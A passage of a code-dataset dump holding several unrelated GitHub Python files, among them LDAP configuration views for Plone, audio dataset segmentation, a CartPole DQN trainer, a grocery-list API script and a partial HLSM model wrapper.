self.pdfFileWriter.add_metadata(metadata)\n with open(self.modifiedPDF, \"wb\") as file:\n self.pdfFileWriter.write(file)\n # endregion\n except Exception as e:\n raise Exception(\"ERROR WRITING METADATA TO FILE :: %s\" % str(e))\n\n def read(self) -> DocumentInformation:\n try:\n return self.pdfFileReader.metadata\n except Exception as e:\n raise Exception(\"ERROR READING METADATA FROM FILE :: %s\" % str(e))","repo_name":"abaker2010/pdf-editor","sub_path":"src/pdf_parts/pdf_metadata.py","file_name":"pdf_metadata.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6616218312","text":"# coding: utf-8\ndef game_core_v2(number):\n '''Implements the binary search algorithm.\n The function takes the hidden number and returns the number of attempts.'''\n count = 1\n low_limit = 1\n high_limit = 100\n predict = (low_limit + high_limit)//2 # Compute the candidate guess\n while number != predict:\n count += 1\n if number > predict: # The hidden number is greater than the guess\n low_limit = predict + 1 # Narrow the search range from below\n predict = (low_limit + high_limit)//2\n elif number < predict: # The hidden number is less than the guess\n high_limit = predict - 1 # Narrow the search range from above\n predict = (low_limit + high_limit)//2\n return(count) # exit the loop once the number is guessed\n\n\nimport numpy as np\ndef score_game(game_core):\n '''Run the game 1000 times to find out how quickly it guesses the number'''\n count_ls = []\n np.random.seed(1) # fix the RANDOM SEED so that the experiment is reproducible!\n random_array = np.random.randint(1,101, size=(1000))\n for number in random_array:\n count_ls.append(game_core(number))\n score = int(np.mean(count_ls))\n print(f\"Your algorithm guesses the number in {score} attempts on average\")\n return(score)\n\n# run it\nscore_game(game_core_v2)\n","repo_name":"serhiymorozov/DEV","sub_path":"module_0/project_0.py","file_name":"project_0.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36056775447","text":"from five import grok\nfrom zope.interface import Interface\nfrom zope.interface import alsoProvides\nfrom zope.component.hooks import getSite\n\nfrom Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.PluggableAuthService.interfaces.plugins import IUserAdderPlugin\nfrom Products.PlonePAS.interfaces.group import IGroupManagement\n\nfrom plone import api\n\nfrom genweb.core.interfaces import IHomePage\n\nimport pkg_resources\nimport logging\n\ntry:\n pkg_resources.get_distribution('Products.PloneLDAP')\nexcept pkg_resources.DistributionNotFound:\n HAS_LDAP = False\nelse:\n HAS_LDAP = True\n from Products.PloneLDAP.factory import manage_addPloneLDAPMultiPlugin\n from Products.LDAPUserFolder.LDAPUserFolder import LDAPUserFolder\n\ntry:\n pkg_resources.get_distribution('plone.app.contenttypes')\nexcept pkg_resources.DistributionNotFound:\n HAS_DXCT = False\nelse:\n HAS_DXCT = True\n from plone.dexterity.utils import createContentInContainer\n\n\nlogger = logging.getLogger(__name__)\n\nimport os\n\nLDAP_PASSWORD = os.environ.get('ldapbindpasswd', '')\n\n\nclass setupDX(grok.View):\n \"\"\" Setup View that fixes p.a.ct front-page\n \"\"\"\n grok.name('setupdxctsite')\n grok.context(Interface)\n grok.require('cmf.ManagePortal')\n\n def render(self):\n if HAS_DXCT:\n portal = 
getSite()\n pl = getToolByName(portal, 'portal_languages')\n if getattr(portal, 'front-page', False):\n portal.manage_delObjects('front-page')\n frontpage = createContentInContainer(portal, 'Document', title=u\"front-page\", checkConstraints=False)\n alsoProvides(frontpage, IHomePage)\n frontpage.exclude_from_nav = True\n frontpage.language = pl.getDefaultLanguage()\n frontpage.reindexObject()\n # Set the default page to the homepage view\n portal.setDefaultPage('homepage')\n return self.request.response.redirect(portal.absolute_url())\n else:\n return 'This site has no p.a.contenttypes installed.'\n\n\nclass setupLDAPUPC(grok.View):\n \"\"\" Configure LDAPUPC for Plone instance \"\"\"\n grok.context(IPloneSiteRoot)\n grok.require('zope2.ViewManagementScreens')\n\n def render(self):\n portal = getSite()\n\n if HAS_LDAP:\n try:\n manage_addPloneLDAPMultiPlugin(portal.acl_users, 'ldapUPC',\n title='ldapUPC', use_ssl=1, login_attr='cn', uid_attr='cn', local_groups=0,\n users_base='ou=Users,dc=upc,dc=edu', users_scope=2,\n roles='Authenticated', groups_base='ou=Groups,dc=upc,dc=edu',\n groups_scope=2, read_only=True, binduid='cn=ldap.serveis,ou=users,dc=upc,dc=edu', bindpwd=LDAP_PASSWORD,\n rdn_attr='cn', LDAP_server='ldap.upc.edu', encryption='SSHA')\n portal.acl_users.ldapUPC.acl_users.manage_edit('ldapUPC', 'cn', 'cn', 'ou=Users,dc=upc,dc=edu', 2, 'Authenticated',\n 'ou=Groups,dc=upc,dc=edu', 2, 'cn=ldap.serveis,ou=users,dc=upc,dc=edu', LDAP_PASSWORD, 1, 'cn',\n 'top,person', 0, 0, 'SSHA', 1, '')\n plugin = portal.acl_users['ldapUPC']\n\n plugin.manage_activateInterfaces(['IGroupEnumerationPlugin', 'IGroupsPlugin', 'IGroupIntrospection', 'IAuthenticationPlugin', 'IUserEnumerationPlugin'])\n # This line is left commented out so that it does not add the server\n # LDAPUserFolder.manage_addServer(portal.acl_users.ldapUPC.acl_users, 'ldap.upc.edu', '636', use_ssl=1)\n\n LDAPUserFolder.manage_deleteLDAPSchemaItems(portal.acl_users.ldapUPC.acl_users, ldap_names=['sn'], REQUEST=None)\n LDAPUserFolder.manage_addLDAPSchemaItem(portal.acl_users.ldapUPC.acl_users, ldap_name='sn', friendly_name='Last Name', public_name='name')\n\n # Move the ldapUPC to the top of the active plugins.\n # Otherwise member.getProperty('email') won't work properly.\n # from Products.PluggableAuthService.interfaces.plugins import IPropertiesPlugin\n # portal.acl_users.plugins.movePluginsUp(IPropertiesPlugin, ['ldapUPC'])\n # portal.acl_users.plugins.manage_movePluginsUp('IPropertiesPlugin', ['ldapUPC'], context.REQUEST.RESPONSE)\n\n except:\n logger.debug('Something bad happened and the LDAP has not been created properly')\n\n try:\n plugin = portal.acl_users['ldapUPC']\n plugin.ZCacheable_setManagerId('RAMCache')\n\n portal_role_manager = portal.acl_users['portal_role_manager']\n portal_role_manager.assignRolesToPrincipal(['Manager'], 'UPC.Plone.Admins')\n portal_role_manager.assignRolesToPrincipal(['Manager'], 'UPCnet.Plone.Admins')\n portal_role_manager.assignRolesToPrincipal(['Manager'], 'UPCnet.ATIC')\n\n except:\n logger.debug('Something bad happened and the LDAP has not been configured properly')\n\n else:\n logger.debug('You do not have LDAP libraries in your current buildout configuration. 
POSOK.')\n\n # try:\n # Remove the cookie system that makes the LDAP search for cn=*\n # portal.acl_users.manage_delObjects('credentials_cookie_auth')\n # except:\n # pass\n\n\nclass setupLDAPExterns(grok.View):\n \"\"\" Configure LDAPExterns for Plone instance \"\"\"\n grok.context(IPloneSiteRoot)\n grok.require('zope2.ViewManagementScreens')\n\n def render(self):\n portal = getSite()\n\n # Delete the LDAPUPC if exists\n if getattr(portal.acl_users, 'ldapUPC', None):\n portal.acl_users.manage_delObjects('ldapUPC')\n\n # try:\n manage_addPloneLDAPMultiPlugin(portal.acl_users, 'ldapexterns',\n title='ldapexterns', use_ssl=1, login_attr='cn', uid_attr='cn', local_groups=0,\n users_base='ou=users,ou=upcnet,dc=upcnet,dc=es', users_scope=2,\n roles='Authenticated,Member', groups_base='ou=groups,ou=upcnet,dc=upcnet,dc=es',\n groups_scope=2, read_only=True, binduid='cn=ldap,ou=upcnet,dc=upcnet,dc=es', bindpwd=LDAP_PASSWORD,\n rdn_attr='cn', LDAP_server='ldap.upcnet.es', encryption='SSHA')\n portal.acl_users.ldapexterns.acl_users.manage_edit('ldapexterns', 'cn', 'cn', 'ou=users,ou=upcnet,dc=upcnet,dc=es', 2, 'Authenticated,Member',\n 'ou=groups,ou=upcnet,dc=upcnet,dc=es', 2, 'cn=ldap,ou=upcnet,dc=upcnet,dc=es', LDAP_PASSWORD, 1, 'cn',\n 'top,person,inetOrgPerson', 0, 0, 'SSHA', 0, '')\n\n plugin = portal.acl_users['ldapexterns']\n\n # Activate plugins (all)\n plugin.manage_activateInterfaces(['IAuthenticationPlugin',\n 'ICredentialsResetPlugin',\n 'IGroupEnumerationPlugin',\n 'IGroupIntrospection',\n 'IGroupManagement',\n 'IGroupsPlugin',\n 'IUserAdderPlugin',\n 'IUserEnumerationPlugin',\n 'IUserManagement',\n 'IPropertiesPlugin',\n 'IRoleEnumerationPlugin',\n 'IRolesPlugin'])\n\n # In case there is more than one server, for fault tolerance\n # LDAPUserFolder.manage_addServer(portal.acl_users.ldapUPC.acl_users, \"ldap.upc.edu\", '636', use_ssl=1)\n\n # Redefine some schema properties\n LDAPUserFolder.manage_deleteLDAPSchemaItems(portal.acl_users.ldapexterns.acl_users, ldap_names=['sn'], REQUEST=None)\n LDAPUserFolder.manage_deleteLDAPSchemaItems(portal.acl_users.ldapexterns.acl_users, ldap_names=['cn'], REQUEST=None)\n LDAPUserFolder.manage_addLDAPSchemaItem(portal.acl_users.ldapexterns.acl_users, ldap_name='sn', friendly_name='Last Name', public_name='fullname')\n LDAPUserFolder.manage_addLDAPSchemaItem(portal.acl_users.ldapexterns.acl_users, ldap_name='cn', friendly_name='Canonical Name')\n\n # Update the preference of the plugins\n portal.acl_users.plugins.movePluginsUp(IUserAdderPlugin, ['ldapexterns'])\n portal.acl_users.plugins.movePluginsUp(IGroupManagement, ['ldapexterns'])\n\n # Move the ldapUPC to the top of the active plugins.\n # Otherwise member.getProperty('email') won't work properly.\n # from Products.PluggableAuthService.interfaces.plugins import IPropertiesPlugin\n # portal.acl_users.plugins.movePluginsUp(IPropertiesPlugin, ['ldapUPC'])\n # portal.acl_users.plugins.manage_movePluginsUp('IPropertiesPlugin', ['ldapUPC'], context.REQUEST.RESPONSE)\n # except:\n # pass\n\n # Add LDAP plugin cache\n plugin = portal.acl_users['ldapexterns']\n plugin.ZCacheable_setManagerId('RAMCache')\n\n # Default configuration for the externs LDAP groups\n groups_query = u'(&(objectClass=groupOfUniqueNames))'\n user_groups_query = u'(&(objectClass=groupOfUniqueNames)(uniqueMember=%s))'\n api.portal.set_registry_record('genweb.controlpanel.core.IGenwebCoreControlPanelSettings.groups_query', groups_query)\n 
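# At query time, the %s placeholder in user_groups_query is filled in with the\n # user's DN, so membership lookups match groupOfUniqueNames entries whose\n # uniqueMember attribute lists that user.\n 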
api.portal.set_registry_record('genweb.controlpanel.core.IGenwebCoreControlPanelSettings.user_groups_query', user_groups_query)\n return 'Done. groupOfUniqueNames in LDAP Controlpanel Search'\n\n\nclass setupLDAP(grok.View):\n \"\"\" Configure basic LDAP for Plone instance \"\"\"\n grok.context(IPloneSiteRoot)\n grok.require('zope2.ViewManagementScreens')\n\n def render(self):\n portal = getSite()\n ldap_name = self.request.form.get('ldap_name', 'ldap')\n ldap_server = self.request.form.get('ldap_server')\n branch_name = self.request.form.get('branch_name')\n base_dn = self.request.form.get('base_dn')\n branch_admin_cn = self.request.form.get('branch_admin_cn')\n branch_admin_password = self.request.form.get('branch_admin_password')\n allow_manage_users = self.request.form.get('allow_manage_users', False)\n\n users_base = 'ou=users,ou={},{}'.format(branch_name, base_dn)\n groups_base = 'ou=groups,ou={},{}'.format(branch_name, base_dn)\n bind_uid = 'cn={},ou={},{}'.format(branch_admin_cn, branch_name, base_dn)\n\n # Delete if exists\n if getattr(portal.acl_users, ldap_name, None):\n portal.acl_users.manage_delObjects('ldapUPC')\n\n manage_addPloneLDAPMultiPlugin(\n portal.acl_users, ldap_name,\n use_ssl=1, login_attr='cn', uid_attr='cn', local_groups=0,\n rdn_attr='cn', encryption='SSHA', read_only=True,\n roles='Authenticated,Member', groups_scope=2, users_scope=2,\n title=ldap_name,\n LDAP_server=ldap_server,\n users_base=users_base,\n groups_base=groups_base,\n binduid=bind_uid,\n bindpwd=branch_admin_password)\n\n ldap_acl_users = getattr(portal.acl_users, ldap_name).acl_users\n ldap_acl_users.manage_edit(\n ldap_name, 'cn', 'cn', users_base, 2, 'Authenticated,Member',\n groups_base, 2, bind_uid, branch_admin_password, 1, 'cn',\n 'top,person,inetOrgPerson', 0, 0, 'SSHA', 0, '')\n\n plugin = portal.acl_users[ldap_name]\n\n active_plugins = [\n 'IAuthenticationPlugin', 'ICredentialsResetPlugin', 'IGroupEnumerationPlugin',\n 'IGroupIntrospection', 'IGroupManagement', 'IGroupsPlugin',\n 'IPropertiesPlugin', 'IRoleEnumerationPlugin', 'IRolesPlugin',\n 'IUserAdderPlugin', 'IUserEnumerationPlugin']\n\n if allow_manage_users:\n active_plugins.append('IUserManagement')\n\n plugin.manage_activateInterfaces(active_plugins)\n\n # Redefine some schema properties\n\n LDAPUserFolder.manage_deleteLDAPSchemaItems(ldap_acl_users, ldap_names=['sn'], REQUEST=None)\n LDAPUserFolder.manage_deleteLDAPSchemaItems(ldap_acl_users, ldap_names=['cn'], REQUEST=None)\n LDAPUserFolder.manage_addLDAPSchemaItem(ldap_acl_users, ldap_name='sn', friendly_name='Last Name', public_name='fullname')\n LDAPUserFolder.manage_addLDAPSchemaItem(ldap_acl_users, ldap_name='cn', friendly_name='Canonical Name')\n\n # Update the preference of the plugins\n portal.acl_users.plugins.movePluginsUp(IUserAdderPlugin, [ldap_name])\n portal.acl_users.plugins.movePluginsUp(IGroupManagement, [ldap_name])\n\n # Add LDAP plugin cache\n plugin = portal.acl_users[ldap_name]\n plugin.ZCacheable_setManagerId('RAMCache')\n return 'Done.'\n","repo_name":"UPCnet/genweb.core","sub_path":"genweb/core/browser/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71889144873","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport argparse\n\nfrom tqdm import tqdm\nfrom glob import glob\nfrom pathlib import PurePath\n\nimport vxs\n\ndef save_segments(ds, pdir):\n os.makedirs(pdir, exist_ok=True)\n 
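# Segments are written one file per class occurrence, e.g. kick_0.wav, kick_1.wav\n # (class names such as 'kick' are illustrative); cls_counters tracks the next\n # index for each class.\n 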
cls_counters = {}\n for i in tqdm(range(len(ds)), 'Segments'):\n segm, cl = ds[i]\n try:\n cl_i = cls_counters[cl]\n except KeyError:\n cls_counters[cl] = 0\n cl_i = 0\n segm.save((pdir + f'/{cl}_{cl_i}.wav'))\n cls_counters[cl] += 1\n\ndef cut_beatboxset1(root, savedir, anno_type):\n ds = vxs.Beatbox1TrackSet(root, annotation_type=anno_type)\n for track, annotation in tqdm(ds.annotated_tracks(), 'Tracks'):\n person = PurePath(track.filepath).stem.split('_')[1]\n pdir = str(savedir / person)\n segments = vxs.cut_track_into_segments(\n track, annotation, classes=vxs.constants.ANNOTATION_CLASSES['beatboxset1'])\n save_segments(segments, pdir)\n\ndef cut_avp(root, savedir, subset):\n subset_dir = savedir / subset.lower()\n subset_root = root / subset\n os.makedirs(subset_dir, exist_ok=True)\n\n participants = sorted([\n int(PurePath(p).stem.split('_')[1])\n for p in glob(str(subset_root / 'Participant_*'))\n ])\n\n savedir_f = str(subset_dir / 'participant_{}')\n\n for p in tqdm(participants, 'Participants'):\n ds = vxs.SegmentSet(\n vxs.AVPTrackSet(root, subset=subset, participant=p, recordings_type='hits'),\n frame_window=None)\n pdir = savedir_f.format(p)\n save_segments(ds, pdir)\n\nENST_DRUM_TYPES = {\n 'hi-hat': ['chh', 'ohh'],\n 'kick': ['bd'],\n 'snare': ['sd', 'sd-'],\n}\n \ndef cut_enst(root, savedir):\n for audio_type, fit_classes in ENST_DRUM_TYPES.items():\n pdir = str(savedir / audio_type)\n print(f'Extracting {audio_type}')\n ds = vxs.ENSTDrumsTrackSet(root, audio_type=audio_type)\n for track, anno in tqdm(ds.annotated_tracks(), 'Tracks'):\n anno = anno[anno['class'].isin(fit_classes)].reset_index()\n segments = vxs.cut_track_into_segments(track, anno)\n save_segments(segments, pdir)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Cut beatbox dataset into chunks')\n parser.add_argument('type', choices=['avp', 'beatboxset1', 'enst'], type=str,\n help='Type of input dataset')\n parser.add_argument('root', metavar='AVP_ROOT', type=PurePath,\n help='Dataset root directory')\n parser.add_argument('save_dir', metavar='SAVE_DIR', type=PurePath,\n help='Directory to save output files')\n parser.add_argument('--subset', choices=['Fixed', 'Personal'], type=str,\n required='avp' in sys.argv,\n help='Subset of AVP to choose from')\n parser.add_argument('--anno_type', choices=['DR', 'HT'], type=str,\n required='beatboxset1' in sys.argv,\n help='Type of annotations for beatboxset1 to use')\n\n args = parser.parse_args()\n if args.type == 'avp':\n cut_avp(args.root, args.save_dir, args.subset)\n elif args.type == 'beatboxset1':\n cut_beatboxset1(args.root, args.save_dir, args.anno_type)\n elif args.type == 'enst':\n cut_enst(args.root, args.save_dir)\n","repo_name":"flyingleafe/vxs-vpt","sub_path":"scripts/cut_dataset.py","file_name":"cut_dataset.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"31734593644","text":"import gym\nfrom CartPole.DQN import DQN\n\n# Hyperparameters\nlearning_rate = 0.001\ndiscount_factor = 0.95\nexploration = 1.0\n\n# Training parameters\nEPISODES = 50000\nSTEPS = 1000\n\nif __name__ == '__main__':\n # The problem to solve\n env = gym.make('CartPole-v1')\n\n # The agent that solves it\n DQN = DQN(env.observation_space.shape[0], # State's dimensions\n env.action_space.n, # Number of available actions\n learning_rate,\n discount_factor,\n exploration)\n\n for e in range(EPISODES):\n state = env.reset()\n total_reward = 0\n\n for t 
in range(STEPS):\n action = DQN.act(state)\n\n if e > 500:\n env.render()\n\n next_state, reward, done, _ = env.step(action)\n\n DQN.add_to_memory((state, action, next_state, reward, done))\n\n total_reward += reward\n\n if done:\n print('Episode: {}'.format(e),\n 'Total reward: {}'.format(total_reward),\n 'Explore P: {:.4f}'.format(DQN.epsilon))\n state = env.reset()\n total_reward = 0\n else:\n state = next_state\n\n DQN.replay(32) # Experience replay with a batch of 32 samples\n","repo_name":"robrav01/TFG-RLDL","sub_path":"CartPole/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73402669994","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n# Load the CSV file\ndf = pd.read_csv(\"a.csv\")\n\n# Set the color palette\ncolors = sns.color_palette('pastel')[0:len(df.columns)]\n\n# For each column, create a pie chart\nfor i, column in enumerate(df.columns):\n fig, ax = plt.subplots(figsize=(10, 10), dpi=100) # Set larger size and dpi\n df[column].value_counts().plot(\n kind=\"pie\",\n ax=ax,\n autopct=\"%1.1f%%\",\n startangle=90,\n colors=colors,\n )\n ax.set_ylabel(\"\")\n plt.title(column)\n plt.savefig(\n f\"out/{column}_pie_chart.png\", dpi=100, transparent=True\n )\n plt.close(fig)\n","repo_name":"TruncatedDinoSour/annual-school-project-23-24","sub_path":"scripts/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35693356447","text":"import requests\nimport json\n\n\ndef get_item_by_upc(upc):\n url = f\"https://shop.wegmans.com/api/v2/store_products?allow_autocorrect=true&limit=60&offset=0&search_provider=buffet&search_term={upc}&secondary_results=false&sort=rank\"\n\n payload = {}\n headers = {\n 'cookie': open('cookie.txt', 'r').read()\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n item = json.loads(response.text)['items'][0]\n print(item)\n if response.status_code != 200:\n pushbullet_message(\"Wegmans\", f\"Failed to get item with UPC: {upc}\")\n return item\n\n\ndef add_item_by_upc(upc):\n item = get_item_by_upc(upc)\n url = \"https://shop.wegmans.com/api/v2/user_lists/default\"\n headers = {\n 'cookie': open('cookie.txt', 'r').read()\n }\n\n payload_json = json.loads('{\"discount_total\":\"0.0\",\"href\":\"/user_lists/default\",\"id\":\"31368411\",\"ids\":{\"grocery\":\"194098\"},\"item_count\":1,\"items\":[{\"id\":\"' + str(item['id']) + '\",\"quantity\":1,\"order_by_weight\":false,\"product_config\":null,\"item_type\":\"store_product\"}],\"modified\":\"2021-06-01T20:05:09.569597+00:00\",\"name\":\"default\",\"offer_progress\":[],\"offer_total\":\"0\",\"points\":{\"awarded\":0},\"pre_discount_product_total\":\"22.26\",\"product_total\":\"22.26\"}')\n payload_json['items'][0]['store_product'] = item\n response = requests.request(\"PUT\", url, headers=headers, json=payload_json)\n print(response.text)\n if response.status_code != 200:\n pushbullet_message(\"Wegmans\", f\"Failed to add item to list: {item['name']}\")\n else:\n pushbullet_message(\"Wegmans\", f\"Added item to list: {item['name']}\")\n\n\ndef pushbullet_message(title, body):\n msg = {\"type\": \"note\", \"title\": title, \"body\": body}\n TOKEN = open('pushbullet.txt', 'r').read()\n resp = requests.post('https://api.pushbullet.com/v2/pushes',\n data=json.dumps(msg),\n 
headers={'Authorization': 'Bearer ' + TOKEN,\n 'Content-Type': 'application/json'})\n if resp.status_code != 200:\n raise Exception('Error', resp.status_code)\n else:\n print('Message sent')\n\n\nif __name__ == '__main__':\n while True:\n add_item_by_upc(input(\"Enter UPC: \"))\n\n","repo_name":"paulhulbert/WegmansGroceryListBarcodeScanner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2182372011","text":"##### from cross attention network https://github.com/blue-blue272/fewshot-CAN\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nfrom torch.utils.data import DataLoader\n\nimport transforms as T\nimport mini_dataset\nimport sampler.mini_sampler_test as sample_test\nimport sampler.mini_sampler_train as sample_train\n\nclass DataManager(object):\n \"\"\"\n Few shot data manager\n \"\"\"\n def __init__(self, args, use_gpu):\n super(DataManager, self).__init__()\n self.args = args\n self.use_gpu = use_gpu\n\n print(\"Initializing dataset {}\".format(args.dataset))\n dataset = mini_dataset.miniImageNet_load()\n transform_train = T.Compose([\n T.RandomCrop(84, padding=8),\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n\n ])\n transform_test = T.Compose([\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n pin_memory = True if use_gpu else False\n\n self.trainloader = DataLoader(\n sample_train.FewShotDataset_train(name='train_loader',\n dataset=dataset.train,\n labels2inds=dataset.train_labels2inds,\n labelIds=dataset.train_labelIds,\n nKnovel=args.nKnovel,\n nExemplars=args.nExemplars,\n nTestNovel=args.train_nTestNovel,\n epoch_size=args.train_epoch_size,\n transform=transform_train,\n load=args.load,\n ),\n batch_size=args.train_batch, shuffle=True, num_workers=args.workers,\n pin_memory=pin_memory, drop_last=True,\n )\n self.testloader = DataLoader(\n sample_test.FewShotDataset_test(name='test_loader',\n dataset=dataset.test,\n labels2inds=dataset.test_labels2inds,\n labelIds=dataset.test_labelIds,\n nKnovel=args.nKnovel,\n nExemplars=args.nExemplars,\n nTestNovel=args.nTestNovel,\n epoch_size=args.epoch_size,\n transform=transform_test,\n load=args.load,\n ),\n batch_size=args.test_batch, shuffle=False, num_workers=args.workers,\n pin_memory=pin_memory, drop_last=False,\n )\n def return_dataloaders(self):\n return self.trainloader, self.testloader\n","repo_name":"corwinliu9669/Learning-a-Few-shot-Embedding-Model-with-Contrastive-Learning","sub_path":"mini_dataloader.py","file_name":"mini_dataloader.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"72"} +{"seq_id":"18042800309","text":"import sys\nsys.path.append(\"/home/ubuntu/efs/teach/src/teach/modeling/hlsm\")\nimport pdb\nfrom pathlib import Path\nfrom typing import List\nimport argparse\nimport os\nimport json\nimport copy\nimport numpy as np\nimport torch\nfrom collections import Counter, OrderedDict\nfrom teach.modeling.hlsm.teach import constants\nfrom teach.modeling.hlsm.teach.data.zoo.guides_edh import GuidesEdhDataset\nfrom teach.modeling.hlsm.teach.data.preprocessor import Preprocessor\nfrom teach.modeling.hlsm.teach.utils import data_util, eval_util, model_util\nfrom teach.dataset.definitions import Definitions\nfrom teach.inference.actions import 
obj_interaction_actions\nfrom teach.inference.teach_model import TeachModel\nfrom teach.logger import create_logger\nfrom lgp.models.alfred.hlsm.alfred_perception_model import AlfredSegmentationAndDepthModel\nfrom lgp.env.alfred.alfred_observation import AlfredObservation\nfrom teach.modeling.hlsm.lgp.agents.agents import get_agent\nimport teach.modeling.hlsm.lgp.parameters as parameters\nfrom lgp.models.teach.hlsm.hlsm_task_repr import HlsmTaskRepr\nfrom lgp.rollout.rollout_actor import RolloutActorLocal\nfrom lgp.env.alfred.alfred_env import AlfredEnv\nfrom lgp import paths\n\nfrom lgp.env.alfred.state_tracker import PoseInfo, InventoryInfo\nfrom lgp.env.privileged_info import PrivilegedInfo\n\nfrom teach.dataset.task_THOR import Task_THOR\n\n\nlogger = create_logger(__name__)\n\nclass ForkedPdb(pdb.Pdb):\n \"\"\"A Pdb subclass that may be used\n from a forked multiprocessing child\n\n \"\"\"\n def interaction(self, *args, **kwargs):\n _stdin = sys.stdin\n try:\n sys.stdin = open('/dev/stdin')\n pdb.Pdb.interaction(self, *args, **kwargs)\n finally:\n sys.stdin = _stdin\n\nclass HLSM_MODEL(TeachModel):\n \"\"\"\n Wrapper around HLSM Model for inference\n \"\"\"\n\n def __init__(self, process_index: int, num_processes: int, model_args: List[str]):\n \"\"\"Constructor\n\n :param process_index: index of the eval process that launched the model\n :param num_processes: total number of processes launched\n :param model_args: extra CLI arguments to teach_eval will be passed along to the model\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--seed\", type=int, default=1, help=\"Random seed\")\n parser.add_argument(\"--device\", type=str, default=\"cuda\", help=\"cpu or cuda\")\n parser.add_argument(\"--model_dir\", type=str, required=True, help=\"Model folder name under $ET_LOGS\")\n parser.add_argument(\"--checkpoint\", type=str, default=\"latest.pth\", help=\"latest.pth or model_**.pth\")\n parser.add_argument(\"--subgoal_model_file\", type=str, default=\"alfred_hlsm_subgoal_model_e5.pytorch\", help=\"Path to subgoal model checkpoint\")\n parser.add_argument(\"--depth_model_file\", type=str, default=\"hlsm_depth_model_e3.pytorch\", help=\"Path to depth model checkpoint\")\n parser.add_argument(\"--seg_model_file\", type=str, default=\"hlsm_segmentation_model_e4.pytorch\", help=\"Path to segmentation model checkpoint\")\n parser.add_argument(\"--navigation_model_file\", type=str, default=\"hlsm_gofor_navigation_model_e5.pytorch\", help=\"Path to navigation model checkpoint\")\n parser.add_argument(\"--experiment_def_name\", type=str, default=\"\", help=\"Name of the experiment to run\")\n parser.add_argument(\n \"--skip_edh_history\",\n action=\"store_true\",\n default=False,\n help=\"Specify this to ignore actions and image frames in EDH history\",\n )\n\n args = parser.parse_args(model_args)\n args.dout = args.model_dir\n self.args = args\n\n logger.info(\"HLSM using args %s\" % str(args))\n np.random.seed(args.seed)\n\n self.object_predictor = None\n self.model = None\n self.extractor = None\n self.vocab = None\n self.preprocessor = None\n\n self.input_dict = None\n self.cur_edh_instance = None\n #ForkedPdb().set_trace()\n self.exp_def = parameters.Hyperparams(parameters.load_experiment_definition(self.args.experiment_def_name))\n parameters.EXPERIMENT_DEFINITION = self.exp_def\n self.set_up_model(process_index)\n device = torch.device(self.exp_def.Setup.device)\n self.latest_extra_events = []\n self.smooth_nav = self.exp_def.Setup.env_setup.d.get(\"smooth_nav\")\n 
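# Failure bookkeeping: _error_is_fatal() bumps fail_count on every failed action\n # and reports a fatal error once it reaches max_fails.\n 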
self.fail_count = 0\n self.max_fails = 10\n self.counter = 0\n\n # self.env = AlfredEnv(device=device,\n # setup=self.exp_def.Setup.env_setup.d,\n # hparams=self.exp_def.Hyperparams.d)\n # from teach.settings import get_settings\n # from teach.simulators.simulator_THOR import COMMIT_ID, TEAChController\n #self.env = TEAChController(base_dir=get_settings().AI2THOR_BASE_DIR, download_only=True, commit_id=COMMIT_ID)\n\n\n\n # def load_checkpoint(self, checkpoint_file, model_file):\n # model_state = torch.load(model_file)\n # checkpoint = torch.load(checkpoint_file)\n # nonbert_optimizer_state = checkpoint[\"nonbert_optimizer\"]\n # bert_optimizer_state = checkpoint[\"bert_optimizer\"]\n # epoch = checkpoint[\"epoch\"]\n # iter = checkpoint[\"iter\"]\n # return (nonbert_optimizer_state, bert_optimizer_state), model_state, epoch, iter\n\n def set_up_model(self, process_index):\n\n os.makedirs(self.args.dout, exist_ok=True)\n model_path = os.path.join(self.args.model_dir, self.args.checkpoint)\n logger.info(\"Loading model from %s\" % model_path)\n logger.info(f\"Loading model agent using device: {self.args.device}\")\n agent = get_agent(self.exp_def.Setup, self.exp_def.Hyperparams, self.args.device, self.exp_def)\n self.model = agent\n self.PERCEPTION_DEVICE = \"cuda\"\n self.depth_model = AlfredSegmentationAndDepthModel(self.exp_def.Hyperparams).to(self.PERCEPTION_DEVICE)\n depth_model_path = self.exp_def.Setup.agent_setup.depth_model_file\n depth_model_path = os.path.join(paths.MODEL_PATH, depth_model_path)\n self.depth_model.load_state_dict(torch.load(depth_model_path))\n self.depth_model.eval()\n self.seg_model = AlfredSegmentationAndDepthModel(self.exp_def.Hyperparams).to(self.PERCEPTION_DEVICE)\n seg_model_path = self.exp_def.Setup.agent_setup.seg_model_file\n seg_model_path = os.path.join(paths.MODEL_PATH, seg_model_path)\n self.seg_model.load_state_dict(torch.load(seg_model_path))\n self.seg_model.eval()\n self.latest_observation = None\n self.latest_action = None\n self.fov = 60\n self.steps 